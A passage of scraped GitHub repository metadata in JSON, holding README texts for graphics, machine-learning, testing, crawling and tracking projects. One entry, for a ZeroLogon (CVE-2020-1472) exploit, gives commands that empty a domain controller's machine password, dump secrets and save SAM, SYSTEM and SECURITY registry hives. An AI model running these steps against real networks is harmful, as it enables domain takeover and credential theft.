Project](https://github.com/SensorsIot/SuperPower)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "PeizhuoLi/neural-blend-shapes", "link": "https://github.com/PeizhuoLi/neural-blend-shapes", "tags": ["computer-graphics", "computer-animation", "deep-learning", "character-animation", "rigging-framework"], "stars": 515, "description": "An end-to-end library for automatic character rigging, skinning, and blend shapes generation, as well as a visualization tool [SIGGRAPH 2021]", "lang": "Python", "repo_lang": "", "readme": "# Learning Skeletal Articulations with Neural Blend Shapes\n\n![Python](https://img.shields.io/badge/Python->=3.8-Blue?logo=python) ![Pytorch](https://img.shields.io/badge/PyTorch->=1.8.0-Red?logo=pytorch)\n![Blender](https://img.shields.io/badge/Blender-%3E=2.8-Orange?logo=blender)\n\nThis repository provides an end-to-end library for automatic character rigging, skinning, and blend shapes generation, as well as a visualization tool. It is based on our work [Learning Skeletal Articulations with Neural Blend Shapes](https://peizhuoli.github.io/neural-blend-shapes/index.html) that is published in SIGGRAPH 2021.\n\n\n\n## Prerequisites\n\nOur code has been tested on Ubuntu 18.04. Before starting, please configure your Anaconda environment by\n\n~~~bash\nconda env create -f environment.yaml\nconda activate neural-blend-shapes\n~~~\n\nOr you may install the following packages (and their dependencies) manually:\n\n- pytorch 1.8\n- tensorboard\n- tqdm\n- chumpy\n\nNote the provided environment only includes the PyTorch CPU version for compatibility consideration.\n\n## Quick Start\n\nWe provide a pretrained model that is dedicated for biped characters. 
Download and extract the pretrained model from [Google Drive](https://drive.google.com/file/d/1S_JQY2N4qx1V6micWiIiNkHercs557rG/view?usp=sharing) or [Baidu Disk](https://pan.baidu.com/s/1y8iBqf1QfxcPWO0AWd2aVw) (9ras) and put the `pre_trained` folder under the project directory. Run\n\n~~~bash\npython demo.py --pose_file=./eval_constant/sequences/greeting.npy --obj_path=./eval_constant/meshes/maynard.obj\n~~~\n\nThe nice greeting animation showed above will be saved in `demo/obj` as obj files. In addition, the generated skeleton will be saved as `demo/skeleton.bvh` and the skinning weight matrix will be saved as `demo/weight.npy`. If you need the bvh file animated, you may specify `--animated_bvh=1`.\n\nIf you are interested in traditional linear blend skinning (LBS) technique result generated with our rig, you can specify `--envelope_only=1` to evaluate our model only with the envelope branch.\n\nWe also provide other several meshes and animation sequences. Feel free to try their combinations!\n\n\n### FBX Output (New!)\n\nNow you can choose to output the animation as a single fbx file instead of a sequence of obj files! Simply do following:\n\n~~~bash\npython demo.py --animated_bvh=1 --obj_output=0\ncd blender_scripts\nblender -b -P nbs_fbx_output.py -- --input ../demo --output ../demo/output.fbx\n~~~\n\nNote that you need to install Blender (>=2.80) to generate the fbx file. You may explore more options on the generated fbx file in the source code.\n\nThis code is contributed by [@huh8686](https://github.com/huh8686).\n\n### Test on Customized Meshes\n\nYou may try to run our model with your own meshes by pointing the `--obj_path` argument to the input mesh. Please make sure your mesh is triangulated and has a consistent upright and front facing orientation. Since our model requires the input meshes are spatially aligned, please specify `--normalize=1`. Alternatively, you can try to scale and translate your mesh to align the provided `eval_constant/meshes/smpl_std.obj` without specifying `--normalize=1`.\n\n### Evaluation\n\nTo reconstruct the quantitative result with the pretrained model, you need to download the test dataset from [Google Drive](https://drive.google.com/file/d/1RwdnnFYT30L8CkUb1E36uQwLNZd1EmvP/view?usp=sharing) or [Baidu Disk](https://pan.baidu.com/s/1c5QCQE3RXzqZo6PeYjhtqQ) (8b0f) and put the two extracted folders under `./dataset` and run\n\n~~~bash\npython evaluation.py\n~~~\n\n\n## Train from Scratch\n\nWe provide instructions for retraining our model.\n\nNote that you may need to reinstall the PyTorch CUDA version since the provided environment only includes the PyTorch CPU version.\n\nTo train the model from scratch, you need to download the training set from [Google Drive](https://drive.google.com/file/d/1RSd6cPYRuzt8RYWcCVL0FFFsL42OeHA7/view?usp=sharing) or [Baidu Disk](https://pan.baidu.com/s/1J-hIVyz19hKZdwKPfS3TtQ) (uqub) and put the extracted folders under `./dataset`.\n\nThe training process contains tow stages, each stage corresponding to one branch. 
To train the first stage, please run\n\n~~~bash\npython train.py --envelope=1 --save_path=[path to save the model] --device=[cpu/cuda:0/cuda:1/...]\n~~~\n\nFor the second stage, it is strongly recommended to use a pre-process to extract the blend shapes basis then start the training for much better efficiency by\n\n~~~bash\npython preprocess_bs.py --save_path=[same path as the first stage] --device=[computing device]\npython train.py --residual=1 --save_path=[same path as the first stage] --device=[computing device] --lr=1e-4\n~~~\n\n## Blender Visualization\n\nWe provide a simple wrapper of blender's python API (>=2.80) for rendering 3D mesh animations and visualize skinning weight. The following code has been tested on Ubuntu 18.04 and macOS Big Sur with Blender 2.92.\n\nNote that due to the limitation of Blender, you cannot run Eevee render engine with a headless machine. \n\nWe also provide several arguments to control the behavior of the scripts. Please refer to the code for more details. To pass arguments to python script in blender, please do following:\n\n~~~bash\nblender [blend file path (optional)] -P [python script path] [-b (running at backstage, optional)] -- --arg1 [ARG1] --arg2 [ARG2]\n~~~\n\n\n\n### Animation\n\nWe provide a simple light and camera setting in `eval_constant/simple_scene.blend`. You may need to adjust it before using. We use `ffmpeg` to convert images into video. Please make sure you have installed it before running. To render the obj files generated above, run\n\n~~~bash\ncd blender_script\nblender ../eval_constant/simple_scene.blend -P render_mesh.py -b\n~~~\n\nThe rendered per-frame image will be saved in `demo/images` and composited video will be saved as `demo/video.mov`. \n\n### Skinning Weight\n\nVisualizing the skinning weight is a good sanity check to see whether the model works as expected. We provide a script using Blender's built-in ShaderNodeVertexColor to visualize the skinning weight. Simply run\n\n~~~bash\ncd blender_script\nblender -P vertex_color.py\n~~~\n\nYou will see something similar to this if the model works as expected:\n\n\n\nMeanwhile, you can import the generated skeleton (in `demo/skeleton.bvh`) to Blender. 
For skeleton rendering, please refer to [deep-motion-editing](https://github.com/DeepMotionEditing/deep-motion-editing).\n\n## Acknowledgements\n\nThe code in `blender_scripts/nbs_fbx_output.py` is contributed by [@huh8686](https://github.com/huh8686).\n\nThe code in `meshcnn` is adapted from [MeshCNN](https://github.com/ranahanocka/MeshCNN) by [@ranahanocka](https://github.com/ranahanocka/).\n\nThe code in `models/skeleton.py` is adapted from [deep-motion-editing](https://github.com/DeepMotionEditing/deep-motion-editing) by [@kfiraberman](https://github.com/kfiraberman), [@PeizhuoLi](https://github.com/PeizhuoLi) and [@HalfSummer11](https://github.com/HalfSummer11).\n\nThe code in `dataset/smpl.py` is adapted from [SMPL](https://github.com/CalciferZh/SMPL) by [@CalciferZh](https://github.com/CalciferZh).\n\nPart of the test models are taken from [SMPL](https://smpl.is.tue.mpg.de/en), [MultiGarmentNetwork](https://github.com/bharat-b7/MultiGarmentNetwork) and [Adobe Mixamo](https://www.mixamo.com).\n\n## Citation\n\nIf you use this code for your research, please cite our paper:\n\n~~~bibtex\n@article{li2021learning,\n author = {Li, Peizhuo and Aberman, Kfir and Hanocka, Rana and Liu, Libin and Sorkine-Hornung, Olga and Chen, Baoquan},\n title = {Learning Skeletal Articulations with Neural Blend Shapes},\n journal = {ACM Transactions on Graphics (TOG)},\n volume = {40},\n number = {4},\n pages = {130},\n year = {2021},\n publisher = {ACM}\n}\n~~~\n\n", "readme_type": "markdown", "hn_comments": "(haven't read the article/paper yet but...)\nI wonder how this works compared to the games industry standard using inverse kinematics?edit: looks like this paper is dedicated to the motion capture side of animations, rather than comparing/blending with procedural generation techniques.So here the idea is to predict which points will be more affected by a deformation, given a 3D mesh model and the corresponding skeleton, right?The output is probably something similar to a normal map. Can the deformation be handled efficiently on the GPU using a geometry shader?Hopefully in a few years we won't have aberrations like parts of a body colliding with another. This is also a frequent issue with boats in game.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "testing-cabal/mock", "link": "https://github.com/testing-cabal/mock", "tags": [], "stars": 515, "description": "The Python mock library", "lang": "Python", "repo_lang": "", "readme": "mock is a library for testing in Python. It allows you to replace parts of\nyour system under test with mock objects and make assertions about how they\nhave been used.\n\nmock is now part of the Python standard library, available as `unittest.mock\n`_ in Python 3.3\nonwards.\n\nThis package contains a rolling backport of the standard library mock code\ncompatible with Python 3.6 and up.\n\nPlease see the standard library documentation for more details.\n\n:Homepage: `Mock Homepage`_\n:Download: `Mock on PyPI`_\n:Documentation: `Python Docs`_\n:License: `BSD License`_\n:Support: `Mailing list (testing-in-python@lists.idyll.org)\n `_\n:Code: `GitHub\n `_\n:Issue tracker: `GitHub Issues\n `_\n:Build status:\n |CircleCI|_ |Docs|_\n\n .. |CircleCI| image:: https://circleci.com/gh/testing-cabal/mock/tree/master.svg?style=shield\n .. _CircleCI: https://circleci.com/gh/testing-cabal/mock/tree/master\n\n .. |Docs| image:: https://readthedocs.org/projects/mock/badge/?version=latest\n .. _Docs: http://mock.readthedocs.org/en/latest/\n\n.. 
_Mock Homepage: http://mock.readthedocs.org/en/latest/\n.. _BSD License: https://github.com/testing-cabal/mock/blob/master/LICENSE.txt\n.. _Python Docs: https://docs.python.org/dev/library/unittest.mock.html\n.. _mock on PyPI: https://pypi.org/project/mock/\n", "readme_type": "rst", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "clvrai/SSGAN-Tensorflow", "link": "https://github.com/clvrai/SSGAN-Tensorflow", "tags": ["ssgan", "semi-supervised-learning", "gan", "generative-adversarial-network"], "stars": 515, "description": "A Tensorflow implementation of Semi-supervised Learning Generative Adversarial Networks (NIPS 2016: Improved Techniques for Training GANs).", "lang": "Python", "repo_lang": "", "readme": "# Semi-supervised learning GAN in Tensorflow\n\nAs part of the implementation series of [Joseph Lim's group at USC](http://csail.mit.edu/~lim), our motivation is to accelerate (or sometimes delay) research in the AI community by promoting open-source projects. To this end, we implement state-of-the-art research papers, and publicly share them with concise reports. Please visit our [group github site](https://github.com/gitlimlab) for other projects.\n\nThis project is implemented by [Shao-Hua Sun](http://shaohua0116.github.io) and the code has been reviewed by [Jiayuan Mao](https://github.com/vacancy) before being published.\n\n## Descriptions\nThis project is a [Tensorflow](https://www.tensorflow.org/) implementation of **Semi-supervised Learning Generative Adversarial Networks** proposed in the paper [Improved Techniques for Training GANs](http://arxiv.org/abs/1606.03498). The intuition is to exploit the samples generated by the GAN generator to boost the performance of image classification tasks by improving generalization.\n\nIn sum, **the main idea** is to train a network that plays both the role of a *classifier* performing an image classification task and that of a *discriminator* trained to distinguish generated samples produced by a *generator* from the real data. To be more specific, the discriminator/classifier takes an image as input and classifies it into *n+1* classes, where *n* is the number of classes of the classification task. True samples are classified into the first *n* classes and generated samples are classified into the *n+1*-th class, as shown in the figure below.\n\n\n\nThe loss of this multi-task learning framework can be decomposed into the **supervised loss**\n\n$L_{supervised} = -\\mathbb{E}_{x,y \\sim p_{data}(x,y)} \\log p_{model}(y \\mid x, y < n+1)$,\n\nand the **GAN loss** of the discriminator\n\n$L_{GAN} = -\\mathbb{E}_{x \\sim p_{data}(x)} \\log \\left(1 - p_{model}(y = n+1 \\mid x)\\right) - \\mathbb{E}_{x \\sim G} \\log p_{model}(y = n+1 \\mid x)$.\n\nDuring the training phase, we jointly minimize the total loss obtained by simply combining the two losses together.\n\nThe implemented model is trained and tested on three publicly available datasets: [MNIST](http://yann.lecun.com/exdb/mnist/), [SVHN](http://ufldl.stanford.edu/housenumbers/), and [CIFAR-10](https://www.cs.toronto.edu/~kriz/cifar.html).\n\nNote that this implementation only follows the main idea of the original paper while differing a lot in implementation details such as model architectures, hyperparameters, applied optimizer, etc. 
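To make the combined objective above concrete, here is a rough NumPy sketch of the two terms (illustrative only and not taken from this repository; the array names, shapes and toy logits are invented for the example):\n\n```python\nimport numpy as np\n\ndef softmax(z):\n    z = z - z.max(axis=1, keepdims=True)\n    e = np.exp(z)\n    return e / e.sum(axis=1, keepdims=True)\n\n# Toy setup: n = 10 real classes plus one extra class for generated samples (the last index).\nrng = np.random.default_rng(0)\nlogits_labeled = rng.normal(size=(4, 11))  # discriminator outputs for labeled real images\nlabels = np.array([0, 3, 7, 9])            # their ground-truth classes in 0..n-1\nlogits_real = rng.normal(size=(4, 11))     # outputs for unlabeled real images\nlogits_fake = rng.normal(size=(4, 11))     # outputs for generated images\n\n# Supervised loss: cross-entropy of the true class on labeled real samples.\np = softmax(logits_labeled)\nloss_supervised = -np.mean(np.log(p[np.arange(len(labels)), labels]))\n\n# GAN loss: real samples should avoid the (n+1)-th class, generated samples should be assigned to it.\nloss_gan = -np.mean(np.log(1 - softmax(logits_real)[:, -1])) - np.mean(np.log(softmax(logits_fake)[:, -1]))\n\ntotal_loss = loss_supervised + loss_gan\n```\n\n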
Also, some useful training tricks applied to this implementation are stated at the end of this README.\n\n\\*This code is still being developed and subject to change.\n\n## Prerequisites\n\n- Python 2.7 or Python 3.3+\n- [Tensorflow 1.0.0](https://github.com/tensorflow/tensorflow/tree/r1.0)\n- [SciPy](http://www.scipy.org/install.html)\n- [NumPy](http://www.numpy.org/)\n\n## Usage\n\nDownload datasets with:\n```bash\n$ python download.py --dataset MNIST SVHN CIFAR10\n```\nTrain models with downloaded datasets:\n```bash\n$ python trainer.py --dataset MNIST\n$ python trainer.py --dataset SVHN\n$ python trainer.py --dataset CIFAR10\n```\nTest models with saved checkpoints:\n```bash\n$ python evaler.py --dataset MNIST --checkpoint ckpt_dir\n$ python evaler.py --dataset SVHN --checkpoint ckpt_dir\n$ python evaler.py --dataset CIFAR10 --checkpoint ckpt_dir\n```\nThe *ckpt_dir* should be like: ```train_dir/default-MNIST_lr_0.0001_update_G5_D1-20170101-194957/model-1001```\n\nTrain and test your own datasets:\n\n* Create a directory\n```bash\n$ mkdir datasets/YOUR_DATASET\n```\n\n* Store your data as an h5py file datasets/YOUR_DATASET/data.hy and each data point contains\n * 'image': has shape [h, w, c], where c is the number of channels (grayscale images: 1, color images: 3)\n * 'label': represented as an one-hot vector\n* Maintain a list datasets/YOUR_DATASET/id.txt listing ids of all data points\n* Modify trainer.py including args, data_info, etc.\n* Finally, train and test models:\n```bash\n$ python trainer.py --dataset YOUR_DATASET\n$ python evaler.py --dataset YOUR_DATASET\n```\n## Results\n\n### MNIST\n\n* Generated samples (100th epochs)\n\n\n\n* First 40 epochs\n\n\n\n### SVHN\n\n* Generated samples (100th epochs)\n\n\n\n* First 160 epochs\n\n\n\n\n### CIFAR-10\n\n* Generated samples (1000th epochs)\n\n\n\n* First 200 epochs\n\n\n\n## Training details\n\n### MNIST\n\n* The supervised loss\n\n\n\n* The loss of Discriminator\n\nD_loss_real\n\n\n\nD_loss_fake\n\n\n\nD_loss (total loss)\n\n\n\n* The loss of Generator\n\nG_loss\n\n\n\n* Classification accuracy\n\n\n\n### SVHN\n\n* The supervised loss\n\n\n\n* The loss of Discriminator\n\nD_loss_real\n\n\n\nD_loss_fake\n\n\n\nD_loss (total loss)\n\n\n\n* The loss of Generator\n\nG_loss\n\n\n\n* Classification accuracy\n\n\n\n### CIFAR-10\n\n* The supervised loss\n\n\n\n* The loss of Discriminator\n\nD_loss_real\n\n\n\nD_loss_fake\n\n\n\nD_loss (total loss)\n\n\n\n* The loss of Generator\n\nG_loss\n\n\n\n* Classification accuracy\n\n\n\n## Training tricks\n\n* To avoid the fast convergence of the discriminator network\n * The generator network is updated more frequently.\n * Higher learning rate is applied to the training of the generator.\n* One-sided label smoothing is applied to the positive labels.\n* Gradient clipping trick is applied to stablize training\n* Reconstruction loss with an annealed weight is applied as an auxiliary loss to help the generator get rid of the initial local minimum.\n* Utilize [Adam](https://arxiv.org/abs/1412.6980) optimizer with higher momentum.\n* Please refer to the codes for more details.\n\n## Related works\n* [Unsupervised and Semi-supervised Learning with Categorical Generative Adversarial Networks](https://arxiv.org/abs/1511.06390) by Springenberg\n* [Semi-Supervised Learning with Generative Adversarial Networks](https://arxiv.org/abs/1606.01583) by Odena\n* [Good Semi-supervised Learning that Requires a Bad GAN](https://arxiv.org/abs/1705.09783) by Dai *et. 
al.*\n* My implementation of [Deep Convolutional Generative Adversarial Networks](https://github.com/shaohua0116/DCGAN-Tensorflow) in Tensorflow\n* The architecture diagram is modified from the one drawn in [Unsupervised Representation Learning with Deep Convolutional Generative Adversarial Networks](https://arxiv.org/abs/1511.06434)\n\n## Acknowledgement\n\nPart of codes is from an unpublished project with [Jongwook Choi](https://github.com/wookayin)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "QuantStack/ipysheet", "link": "https://github.com/QuantStack/ipysheet", "tags": ["jupyter", "widgets", "spreadsheet"], "stars": 515, "description": "Jupyter handsontable integration", "lang": "Python", "repo_lang": "", "readme": "# ipysheet\n\n# WARNING\n\nDue to [Handsontable licensing changes](https://handsontable.com/blog/articles/2019/3/handsontable-drops-open-source-for-a-non-commercial-license) ipysheet is stuck witch the outdated Handsontable version 6.2.2 (open-source).\nWe recommend not using ipysheet anymore. We suggest an alternative like [ipydatagrid](https://github.com/bloomberg/ipydatagrid).\n\nSpreadsheet in the Jupyter notebook:\n\n * Try it out using binder: [![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/QuantStack/ipysheet/stable?filepath=docs%2Fsource%2Findex.ipynb)\n * Or check out the documentation at [https://ipysheet.readthedocs.io/](https://ipysheet.readthedocs.io/en/stable/)\n\n**Create a table and drive a value using ipywidgets:**\n\n![Slider Screencast](docs/source/ipysheet_slider.gif)\n\n**Perform a calculation on slider change:**\n\n![Slider Calculation Screencast](docs/source/ipysheet_slider_calculation.gif)\n\n**Change cell style depending on the value using renderers:**\n\n![Conditional formatting](docs/source/conditional_formatting.png)\n\n**Populate table using cell ranges:**\n\n![Cell Ranges Screencast](docs/source/ipysheet_cell_range.gif)\n\n# Installation\n\nWith conda:\n\n```\n$ conda install -c conda-forge ipysheet\n```\n\nWith pip:\n\n```\n$ pip install ipysheet\n```\n\n### Development install\n\nNote: You will need NodeJS to build the extension package.\n\nThe `jlpm` command is JupyterLab's pinned version of\n[yarn](https://yarnpkg.com/) that is installed with JupyterLab. You may use\n`yarn` or `npm` in lieu of `jlpm` below.\n\n```bash\n# Clone the repo to your local environment\n# Change directory to the ipysheet directory\n# Install package in development mode\npip install -e .\n# Link your development version of the extension with JupyterLab\njupyter labextension develop . --overwrite\n# Rebuild extension Typescript source after making changes\njlpm run build\n```\n\nYou can watch the source directory and run JupyterLab at the same time in different terminals to watch for changes in the extension's source and automatically rebuild the extension.\n\n```bash\n# Watch the source directory in one terminal, automatically rebuilding when needed\njlpm run watch\n# Run JupyterLab in another terminal\njupyter lab\n```\n\nWith the watch command running, every saved change will immediately be built locally and available in your running JupyterLab. Refresh JupyterLab to load the change in your browser (you may need to wait several seconds for the extension to be rebuilt).\n\nBy default, the `jlpm run build` command generates the source maps for this extension to make it easier to debug using the browser dev tools. 
To also generate source maps for the JupyterLab core extensions, you can run the following command:\n\n```bash\njupyter lab build --minimize=False\n```\n\n### Development uninstall\n\n```bash\npip uninstall ipysheet\n```\n\nIn development mode, you will also need to remove the symlink created by the `jupyter labextension develop`\ncommand. To find its location, you can run `jupyter labextension list` to figure out where the `labextensions`\nfolder is located. Then you can remove the symlink named `ipysheet` within that folder.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "uber-research/go-explore", "link": "https://github.com/uber-research/go-explore", "tags": [], "stars": 515, "description": "Code for Go-Explore: a New Approach for Hard-Exploration Problems", "lang": "Python", "repo_lang": "", "readme": "# Go-Explore\n\nThis is the code for [First return then explore](https://arxiv.org/abs/2004.12919), the new Go-explore paper. Code for the [original paper](https://arxiv.org/abs/1901.10995) can be found in this repository under the tag \"v1.0\" or the release \"Go-Explore v1\". \n\nThe code for Go-Explore with a deterministic exploration phase followed by a robustification phase is located in the `robustified` subdirectory. The code for Go-Explore with a policy-based exploration phase is located in the `policy_based` subdirectory. Installation instructions for each variant of Go-Explore can be found in their respective directories.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "chenjiandongx/bili-spider", "link": "https://github.com/chenjiandongx/bili-spider", "tags": ["bilibili", "spider"], "stars": 515, "description": "\ud83d\udcfa Bilibili site-wide video information crawler", "lang": "Python", "repo_lang": "", "readme": "# Bilibili Site-wide Video Information Crawler\n\nI think everyone is familiar with Bilibili, and in fact a quick online search turns up piles of Bilibili crawlers. But **what you learn on paper is always shallow; to really understand something you have to do it yourself**: I code, therefore I am. In the end, the total amount of data crawled was **13 million** records.\n\n#### Development environment: Windows10 + python3\n\n### Preparation\n\nFirst open Bilibili and click into any video on the home page. The usual routine: open the developer tools. The goal this time is to obtain video information by crawling the API that Bilibili provides instead of parsing web pages; parsing pages is too slow and easily gets your IP banned.\n\nCheck the JS option and refresh with F5\n\n![bili-0](https://github.com/chenjiandongx/bili-spider/blob/master/images/bili-0.png)\n\nWe found the address of the API\n\n![bili-1](https://github.com/chenjiandongx/bili-spider/blob/master/images/bili-1.png)\n\nCopy it, strip out the unnecessary parts, and you get https://api.bilibili.com/x/web-interface/archive/stat?aid=15906633 . Open it in a browser and you will get the following JSON 
data\n\n![bili-2](https://github.com/chenjiandongx/bili-spider/blob/master/images/bili-2.png)\n\n### Writing the Code\n\nOK, at this point we can start writing the code: fetch the data by iterating over requests, and use multithreading to make the crawler more efficient.\n\n#### Core code\n```\nresult = []\nreq = requests.get(url, headers=headers, timeout=6).json()\ntime.sleep(0.6)  # delay, to avoid the IP getting banned for requesting too fast\ntry:\n    data = req['data']\n    video = (\n        total,\n        data['aid'],       # video id\n        data['view'],      # view count\n        data['danmaku'],   # danmaku (bullet comment) count\n        data['reply'],     # reply count\n        data['favorite'],  # favorite count\n        data['coin'],      # coin count\n        data['share']      # share count\n    )\n    with lock:\n        result.append(video)\n        if total % 100 == 0:\n            print(total)\n        total += 1\nexcept:\n    pass\n```\n\n#### Iterative crawling\n```\nurls = [\"http://api.bilibili.com/archive_stat/stat?aid={}\".format(i)\n        for i in range(10000)]\nwith futures.ThreadPoolExecutor(32) as executor:  # multithreading\n    executor.map(run, urls)\n```\n\nAfter crawling, the data is stored in a MySQL database; in total, 13M+ records were collected.\n\nThe first 7.5M records are available here: [bili.zip](https://github.com/chenjiandongx/bili-spider/blob/master/data/bili.zip)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "risksense/zerologon", "link": "https://github.com/risksense/zerologon", "tags": [], "stars": 515, "description": "Exploit for zerologon cve-2020-1472", "lang": "Python", "repo_lang": "", "readme": "# ZeroLogon exploitation script\n\nExploit code based on https://www.secura.com/blog/zero-logon and https://github.com/SecuraBV/CVE-2020-1472. Original research and scanner by Secura, modifications by RiskSense Inc.\n\nTo exploit, clear out any previous Impacket installs you have and install Impacket from https://github.com/SecureAuthCorp/impacket/commit/b867b21 or newer. Then, do:\n\n```\npython3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR\n```\n\nIf that's successful you will then be able to:\n```\nsecretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'\n```\nwhich should get you Domain Admin. After you have that, use wmiexec.py to connect to the target DC with a credential from the secretsdump and do\n```\nreg save HKLM\\SYSTEM system.save\nreg save HKLM\\SAM sam.save\nreg save HKLM\\SECURITY security.save\nget system.save\nget sam.save\nget security.save\ndel /f system.save\ndel /f sam.save\ndel /f security.save\n```\n\nThen you can\n```\nsecretsdump.py -sam sam.save -system system.save -security security.save LOCAL\n```\nAnd that should show you the original NT hash of the machine account. 
You can then re-install that original machine account hash to the domain by\n```\npython3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH\n```\n\nReinstalling the original hash is necessary for the DC to continue to operate normally.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Socialbird-AILab/BERT-Classification-Tutorial", "link": "https://github.com/Socialbird-AILab/BERT-Classification-Tutorial", "tags": [], "stars": 515, "description": null, "lang": "Python", "repo_lang": "", "readme": "#BERT-Classification-Tutorial\nLabeling data can be said to be the most difficult task in AI model training. Data annotation for natural language processing requires a lot of manpower. Compared with image annotation in computer vision, there is usually no accurate standard answer for text annotation, and the understanding of sentences varies from person to person, making this task even more difficult.\nbut! Google's recently released BERT has greatly solved this problem! According to our experiments, BERT can bring a significant improvement in classification accuracy with extremely small data in the multi-text classification task. Moreover, the main comparison of the experiment is the State of the art language model transfer learning model - ULMFiT (https://arxiv.org/abs/1801.06146) released only 5 months ago, and the results have been significantly improved.\n\n![alt text](https://github.com/Socialbird-AILab/BERT-Classification-Tutorial/blob/master/pictures/Results.png)\n\nFrom the above figure, we can see that in different data sets, BERT has very good performance. The experimental data we use is divided into 1000, 6700 and 12000 pieces, and each contains test data, and the training test split is 80%-20%. The dataset is obtained from multiple web sources and undergoes a series of taxonomic mappings. However, the Noisy dataset has significant noise, and sampling statistics show that the noise ratio is around 20%. The experiment compared several models, from the most basic convolutional network as Baseline, to convolutional network plus traditional word vector Glove embedding, and then ULMFiT and BERT.\n\n\n# 1. Operating environment\nThe Tensorflow version is Windows 1.10.0 GPU, and the specific installation tutorial can refer to this link https://www.tensorflow.org/install/pip?lang=python3. Anaconda version is 1.9.2.\n\n# 2. Hardware configuration\nThe graphics card used in the experiment is NVIDIA GeoForce GTX 1080 Ti, and the BERT base model occupies about 9.5G of video memory.\n\n# 3. Download the model\nAfter all the operating environments are set up, we can download the BERT base for our experiment here: https://storage.googleapis.com/bert_models/2018_10_18/uncased_L-12_H-768_A-12.zip\n After downloading, put it in BERT_BASE_DIR.\n\n# 4. Input data preparation\nWe need to split the text data into three parts:\n\" Train: train.tsv\n\" Evaluate: dev.tsv\n\" Test: test.tsv\nBelow you can see the format of each file, which is very simple. One column is the text data that needs to be classified, and the other column is the corresponding Label.\n\nThe data folder contains 1000 sample data of 10 categories, which are divided into training and testing sets.\n\n![alt text](https://github.com/Socialbird-AILab/BERT-Classification-Tutorial/blob/master/pictures/Our%20data%20example.png)\n\n# 5. 
Implementation details\nRun run_classifier.py to implement the text classification task of 1000 10-category sample data. For specific implementation details, please refer to the tutorial: https://mp.weixin.qq.com/s/XmeDjHSFI0UsQmKeOgwnyA", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "framespot/client-py", "link": "https://github.com/framespot/client-py", "tags": ["upload-filter", "copyright-protection", "copyright-violation-detection", "copyright-infringement", "copyright-scan", "content-recognition"], "stars": 514, "description": "Free Copyright Filter to fulfill EU Upload Filter Directive", "lang": "Python", "repo_lang": "", "readme": "Free copyright filter to fulfill EU Copyright Directive\n\n### Install dependencies\n\nThe python client depends on `opencv-contrib-python` or `opencv-contrib-python-headless`\n\n```\ngit clone https://github.com/framespot/client-py.git\ncd client-py\npip install -r requirements.txt\n```\n\n### Inference copyright\n\n```\npython . --verbose /path/to/movie.mp4\npython . --verbose /path/to/stockphoto.jpg\n```\n\n### Example result\n\n```JSON\n[{\n \"uri\": \"https://www.imdb.com/title/tt2380307/\",\n \"ids\": {\"imdb\": \"tt2380307\", \"tmdb\": \"movie/354912\"},\n \"title\": \"Coco\",\n \"year\": \"2017\",\n \"genres\": [\"Animation\",\"Family\",\"Comedy\",\"Adventure\",\"Fantasy\"],\n \"companies\": [\"Pixar\",\"Walt Disney Pictures\"],\n \"homepage\": \"https://www.pixar.com/feature-films/coco\",\n \"poster\": \"https://www.themoviedb.org/t/p/original/gGEsBPAijhVUFoiNpgZXqRVWJt2.jpg\",\n \"frames\": [{\n \"type\": \"movie\",\n \"season\": null,\n \"episode\": null,\n \"offset\": 1855,\n \"hamming\": 8,\n \"matrix\": [[ 1.001, 0.008,-0.001],\n [-0.008, 1.001, 0.004]]\n }]\n}]\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "got-10k/toolkit", "link": "https://github.com/got-10k/toolkit", "tags": [], "stars": 514, "description": "Official Python toolkit for generic object tracking benchmark GOT-10k and beyond", "lang": "Python", "repo_lang": "", "readme": "# GOT-10k Python Toolkit\n\n> UPDATE:
\n> All common tracking datasets (GOT-10k, OTB, VOT, UAV, TColor, DTB, NfS, LaSOT and TrackingNet) are supported.
\n> Support VOT2019 (ST/LT/RGBD/RGBT) downloading.
\n> Fix the randomness in ImageNet-VID ([issue #13](https://github.com/got-10k/toolkit/issues/13)).\n\n_Run experiments over common tracking benchmarks (code from [siamfc](https://github.com/got-10k/siamfc/blob/master/test.py)):_\n\n\"sample_batch_run\"\n\nThis repository contains the official Python toolkit for running experiments and evaluating performance on the [GOT-10k](http://got-10k.aitestunion.com/) benchmark. The code is written in pure Python and is compile-free. Although we support both Python 2 and Python 3, we recommend Python 3 for better performance.\n\nFor convenience, the toolkit also provides unofficial implementations of dataset interfaces and tracking pipelines for the [OTB (2013/2015)](http://cvlab.hanyang.ac.kr/tracker_benchmark/index.html), [VOT (2013~2018)](http://votchallenge.net), [DTB70](https://github.com/flyers/drone-tracking), [TColor128](http://www.dabi.temple.edu/~hbling/data/TColor-128/TColor-128.html), [NfS (30/240 fps)](http://ci2cv.net/nfs/index.html), [UAV (123/20L)](https://ivul.kaust.edu.sa/Pages/pub-benchmark-simulator-uav.aspx), [LaSOT](https://cis.temple.edu/lasot/) and [TrackingNet](https://tracking-net.org/) benchmarks. It also offers interfaces for the [ILSVRC VID](https://image-net.org/challenges/LSVRC/2015/#vid) and [YouTube-BoundingBox](https://research.google.com/youtube-bb/) (coming soon!) datasets.\n\n[GOT-10k](http://got-10k.aitestunion.com/) is a large, high-diversity, one-shot 